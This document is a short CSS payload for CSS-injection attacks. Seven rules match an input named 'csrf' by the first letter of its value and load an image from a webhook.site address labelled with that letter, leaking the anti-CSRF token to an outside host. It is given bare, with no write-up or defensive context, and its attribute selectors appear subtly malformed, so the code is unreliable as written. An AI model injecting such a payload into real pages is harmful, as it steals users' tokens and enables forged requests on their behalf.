input[name=csrf][value=^a] {
    background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?a);
}
input[name=csrf][value=^b] {
    background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?b);
}
input[name=csrf][value=^c] {
    background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?c);
}
input[name=csrf][value=^d] {
    background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?d);
}
input[name=csrf][value=^e] {
    background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?e);
}
input[name=csrf][value=^f] {
    background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?f);
}
input[name=csrf][value=^g] {
    background-image: url(https://webhook.site/b943f931-9935-4f24-ac55-c78b181a80b9?g);
}
